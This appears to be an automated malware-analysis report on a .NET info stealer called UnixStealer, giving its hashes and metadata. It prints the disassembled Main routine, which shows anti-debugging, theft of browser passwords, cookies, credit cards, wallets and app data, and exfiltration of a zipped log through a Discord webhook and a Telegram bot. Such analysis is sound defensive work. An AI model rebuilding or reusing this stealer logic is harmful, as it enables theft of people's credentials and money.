b3212718f357a61c2bc533bbe0b921d1
PE Executable | MD5: b3212718f357a61c2bc533bbe0b921d1 | Size: 292.88 KB | application/x-dosexec
Symbol Obfuscation Score

| Hash | Hash Value |
|---|---|
| MD5 | b3212718f357a61c2bc533bbe0b921d1 |
| Sha1 | 9134ea9ce0054ce90106f647b5961eb7e8614b13 |
| Sha256 | b6dd020607b6f63182a969b8264941575dc3df0acdb5ca35cf73f30d7edb76b8 |
| Sha384 | 0bf7b5f565109d2878906180f9a2ed1fdf176c472d2b65f20c9f0d55eb156fe5e60ce89e379fff4bec282217a7e23c7d |
| Sha512 | d135edf1e6e9f857ead6041fe637ee4ec39fa6984a6da3563582d0da88a10345b04c39ee45589f9fe4f5db433c41f0255d65a65c42fa73e11d17a967ac523301 |
| SSDeep | 6144:qL59NhegY2f0jaQ5IbymkBTlteQwBKhaGbVO4rbUg4CW:qFh2j7Obw3Lc+aOrbOCW |
| TLSH | 53544B0027ED4A5AF3FF5BB8E0B1116583B1B466F93EDB8E6C4460EE1923740D951BA3 |

PeID

| Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Info | Overlay extracted: Overlay_fc91c83c.bin (526 bytes) |
| Info | PDB Path: C:\Users\brtig\OneDrive\Desktop\Src\UnixStealer\UnixStealer\obj\Release\UnixStealer.pdb |
| Module Name | UnixStealer.exe |
| Full Name | UnixStealer.exe |
| EntryPoint | System.Void UnixStealer.Program::Main(System.String[]) |
| Scope Name | UnixStealer.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | UnixStealer |
| Assembly Version | 1.6.2.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.8 |
| Total Strings | 1394 |
| Main Method | System.Void UnixStealer.Program::Main(System.String[]) |
| Main IL Instruction Count | 467 |
| Main IL | call System.Void UnixStealer.Stealth::HideConsole() call System.Void UnixStealer.Stealth::PreventClose() call System.Void UnixStealer.Stealth::SetProcessPriority() call System.Void UnixStealer.AntiDebug::CheckDebugger() call System.Void UnixStealer.AntiDebug::StartAntiDebugThread() ldsfld System.String UnixStealer.Help::ExploitDir call System.Boolean System.IO.File::Exists(System.String) brtrue IL_054A: ret call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.String System.Diagnostics.Process::get_ProcessName() call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> conv.i4 <null> ldc.i4.1 <null> bne.un IL_054A: ret ldsfld System.String UnixStealer.Help::ExploitDir call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.Threading.Thread>::.ctor() stloc.0 <null> ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_0 dup <null> brtrue.s IL_0070: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_0() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_0 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_1 dup <null> brtrue.s IL_009A: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_1() newobj System.Void 
System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_1 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_2 dup <null> brtrue.s IL_00C4: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_2() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_2 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_3 dup <null> brtrue.s IL_00EE: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_3() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_3 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_4 dup <null> brtrue.s IL_0118: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void 
UnixStealer.Program/<>c::<Main>b__0_4() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_4 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> ldsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_5 dup <null> brtrue.s IL_0142: newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) pop <null> ldsfld UnixStealer.Program/<>c UnixStealer.Program/<>c::<>9 ldftn System.Void UnixStealer.Program/<>c::<Main>b__0_5() newobj System.Void System.Threading.ThreadStart::.ctor(System.Object,System.IntPtr) dup <null> stsfld System.Threading.ThreadStart UnixStealer.Program/<>c::<>9__0_5 newobj System.Void System.Threading.Thread::.ctor(System.Threading.ThreadStart) callvirt System.Void System.Collections.Generic.List`1<System.Threading.Thread>::Add(System.Threading.Thread) ldloc.0 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_7 br.s IL_0162: ldloca.s V_7 ldloca.s V_7 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() callvirt System.Void System.Threading.Thread::Start() ldloca.s V_7 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_0156: ldloca.s V_7 leave.s IL_017B: ldloc.0 ldloca.s V_7 constrained. 
System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.0 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> System.Collections.Generic.List`1<System.Threading.Thread>::GetEnumerator() stloc.s V_7 br.s IL_0191: ldloca.s V_7 ldloca.s V_7 call System.Threading.Thread System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::get_Current() callvirt System.Void System.Threading.Thread::Join() ldloca.s V_7 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.Threading.Thread>::MoveNext() brtrue.s IL_0185: ldloca.s V_7 leave.s IL_01AA: ldc.i4.7 ldloca.s V_7 constrained. System.Collections.Generic.List`1/Enumerator<System.Threading.Thread> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.7 <null> newarr System.String dup <null> ldc.i4.0 <null> ldsfld System.String UnixStealer.Help::ExploitDir stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr \ stelem.ref <null> dup <null> ldc.i4.2 <null> call System.String UnixStealer.SystemInfo::CountryCode() stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String UnixStealer.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr ( stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String UnixStealer.Help::dateLog stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr ).zip stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.1 <null> ldstr cp866 call System.Text.Encoding System.Text.Encoding::GetEncoding(System.String) newobj System.Void Ionic.Zip.ZipFile::.ctor(System.Text.Encoding) stloc.s V_8 ldloc.s V_8 ldc.i4.m1 <null> conv.i8 <null> callvirt System.Void Ionic.Zip.ZipFile::set_ParallelDeflateThreshold(System.Int64) ldloc.s V_8 ldc.i4.2 <null> callvirt System.Void Ionic.Zip.ZipFile::set_UseZip64WhenSaving(Ionic.Zip.Zip64Option) ldloc.s V_8 ldc.i4.6 <null> callvirt System.Void 
Ionic.Zip.ZipFile::set_CompressionLevel(Ionic.Zlib.CompressionLevel) ldloc.s V_8 ldstr callvirt System.Void Ionic.Zip.ZipFile::set_Comment(System.String) ldloc.s V_8 ldsfld System.String UnixStealer.Config::zipPass callvirt System.Void Ionic.Zip.ZipFile::set_Password(System.String) ldloc.s V_8 ldsfld System.String UnixStealer.Help::ExploitDir callvirt Ionic.Zip.ZipEntry Ionic.Zip.ZipFile::AddDirectory(System.String) pop <null> ldloc.s V_8 ldloc.1 <null> callvirt System.Void Ionic.Zip.ZipFile::Save(System.String) leave.s IL_0253: ldc.i4.s 32 ldloc.s V_8 brfalse.s IL_0252: endfinally ldloc.s V_8 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.s 32 newarr System.String dup <null> ldc.i4.0 <null> ldstr :spy: NEW LOG FROM - stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String System.Environment::get_MachineName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr :person_in_manual_wheelchair: :eye: IP: stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String UnixStealer.SystemInfo::IP() stelem.ref <null> dup <null> ldc.i4.6 <null> ldstr stelem.ref <null> dup <null> ldc.i4.7 <null> call System.String UnixStealer.SystemInfo::Country() stelem.ref <null> dup <null> ldc.i4.8 <null> ldstr :desktop: stelem.ref <null> dup <null> ldc.i4.s 9 call System.String UnixStealer.SystemInfo::GetSystemVersion() stelem.ref <null> dup <null> ldc.i4.s 10 ldstr ================================ :key: Passwords - stelem.ref <null> dup <null> ldc.i4.s 11 ldsflda System.Int32 UnixStealer.Counting::Passwords call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 12 ldstr :cookie: Cookies - stelem.ref <null> dup <null> ldc.i4.s 13 ldsflda System.Int32 UnixStealer.Counting::Cookies call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 14 ldstr 
:notepad_spiral: AutoFills - stelem.ref <null> dup <null> ldc.i4.s 15 ldsflda System.Int32 UnixStealer.Counting::AutoFill call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 16 ldstr :credit_card: CC - stelem.ref <null> dup <null> ldc.i4.s 17 ldsflda System.Int32 UnixStealer.Counting::CreditCards call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 18 ldstr :file_folder: Grabbed Files - stelem.ref <null> dup <null> ldc.i4.s 19 ldsflda System.Int32 UnixStealer.Counting::FileGrabber call System.String System.Int32::ToString() stelem.ref <null> dup <null> ldc.i4.s 20 ldstr ================================ GRABBED SOFTWARE: stelem.ref <null> dup <null> ldc.i4.s 21 ldsfld System.Int32 UnixStealer.Counting::Discord ldc.i4.0 <null> bgt.s IL_0339: ldstr "\n Discord" ldstr br.s IL_033E: stelem.ref ldstr Discord stelem.ref <null> dup <null> ldc.i4.s 22 ldsfld System.Int32 UnixStealer.Counting::Wallets ldc.i4.0 <null> bgt.s IL_0351: ldstr "\n Wallets" ldstr br.s IL_0356: stelem.ref ldstr Wallets stelem.ref <null> dup <null> ldc.i4.s 23 ldsfld System.Int32 UnixStealer.Counting::Telegram ldc.i4.0 <null> bgt.s IL_0369: ldstr "\n Telegram" ldstr br.s IL_036E: stelem.ref ldstr Telegram stelem.ref <null> dup <null> ldc.i4.s 24 ldsfld System.Int32 UnixStealer.Counting::FileZilla ldc.i4.0 <null> bgt.s IL_0381: ldstr "\n FileZilla (" ldstr br.s IL_039A: stelem.ref ldstr FileZilla ( ldsflda System.Int32 UnixStealer.Counting::FileZilla call System.String System.Int32::ToString() ldstr ) call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 25 ldsfld System.Int32 UnixStealer.Counting::Steam ldc.i4.0 <null> bgt.s IL_03AD: ldstr "\n Steam" ldstr br.s IL_03B2: stelem.ref ldstr Steam stelem.ref <null> dup <null> ldc.i4.s 26 ldsfld System.Int32 UnixStealer.Counting::NordVPN ldc.i4.0 <null> bgt.s IL_03C5: ldstr "\n NordVPN" ldstr br.s IL_03CA: stelem.ref ldstr NordVPN 
stelem.ref <null> dup <null> ldc.i4.s 27 ldsfld System.Int32 UnixStealer.Counting::OpenVPN ldc.i4.0 <null> bgt.s IL_03DD: ldstr "\n OpenVPN" ldstr br.s IL_03E2: stelem.ref ldstr OpenVPN stelem.ref <null> dup <null> ldc.i4.s 28 ldsfld System.Int32 UnixStealer.Counting::ProtonVPN ldc.i4.0 <null> bgt.s IL_03F5: ldstr "\n ProtonVPN" ldstr br.s IL_03FA: stelem.ref ldstr ProtonVPN stelem.ref <null> dup <null> ldc.i4.s 29 ldsfld System.Int32 UnixStealer.Counting::VimeWorld ldc.i4.0 <null> bgt.s IL_040D: ldstr "\n VimeWorld" ldstr br.s IL_0460: stelem.ref ldstr VimeWorld ldsfld System.Boolean UnixStealer.Config::VimeWorld brtrue.s IL_0420: ldc.i4.6 ldstr br.s IL_045B: call System.String System.String::Concat(System.String,System.String) ldc.i4.6 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr : NickName - stelem.ref <null> dup <null> ldc.i4.1 <null> call System.String UnixStealer.VimeWorld::NickName() stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr : Donate - stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String UnixStealer.VimeWorld::Donate() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr : Level - stelem.ref <null> dup <null> ldc.i4.5 <null> call System.String UnixStealer.VimeWorld::Level() stelem.ref <null> call System.String System.String::Concat(System.String[]) call System.String System.String::Concat(System.String,System.String) stelem.ref <null> dup <null> ldc.i4.s 30 ldstr ================================ DOMAINS DETECTED: - stelem.ref <null> dup <null> ldc.i4.s 31 ldsfld System.String UnixStealer.Help::ExploitDir ldstr \Browsers\ call System.String System.String::Concat(System.String,System.String) call System.String UnixStealer.URLSearcher::GetDomainDetect(System.String) stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.2 <null> call System.String System.Environment::get_MachineName() ldstr . 
call System.String System.Environment::get_UserName() ldstr .zip call System.String System.String::Concat(System.String,System.String,System.String,System.String) stloc.3 <null> ldstr zip stloc.s V_4 ldloc.1 <null> stloc.s V_5 ldstr stloc.s V_6 ldsfld System.String UnixStealer.Config::discordWebhook call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_04CD: ldsfld System.String UnixStealer.Config::telegramBotToken ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 ldloc.s V_5 ldloc.s V_6 call System.String DiscordWebhook::SendFile(System.String,System.String,System.String,System.String,System.String) pop <null> ldsfld System.String UnixStealer.Config::telegramBotToken call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_04F7: leave.s IL_053C ldsfld System.String UnixStealer.Config::telegramChatId call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_04F7: leave.s IL_053C ldloc.2 <null> call System.Void UnixStealer.Telegram::SendMessage(System.String) ldloc.s V_5 ldstr Unix Stealer Log call System.Void UnixStealer.Telegram::SendFile(System.String,System.String) leave.s IL_053C: call System.Void UnixStealer.Program::Finish() pop <null> ldsfld System.String UnixStealer.Config::telegramBotToken call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_051E: ldsfld System.String UnixStealer.Config::discordWebhook ldsfld System.String UnixStealer.Config::telegramChatId call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_051E: ldsfld System.String UnixStealer.Config::discordWebhook ldstr Log size is more then 8 MB. Sending isn`t available. call System.Void UnixStealer.Telegram::SendMessage(System.String) br.s IL_0535: leave.s IL_053A ldsfld System.String UnixStealer.Config::discordWebhook call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0535: leave.s IL_053A ldstr Log size is more then 8 MB. Sending isn`t available. 
call System.String DiscordWebhook::Send(System.String) pop <null> leave.s IL_053A: leave.s IL_053C pop <null> leave.s IL_053A: leave.s IL_053C leave.s IL_053C: call System.Void UnixStealer.Program::Finish() call System.Void UnixStealer.Program::Finish() leave.s IL_054A: ret call System.Void System.Console::WriteLine(System.Object) leave.s IL_054A: ret ret <null> |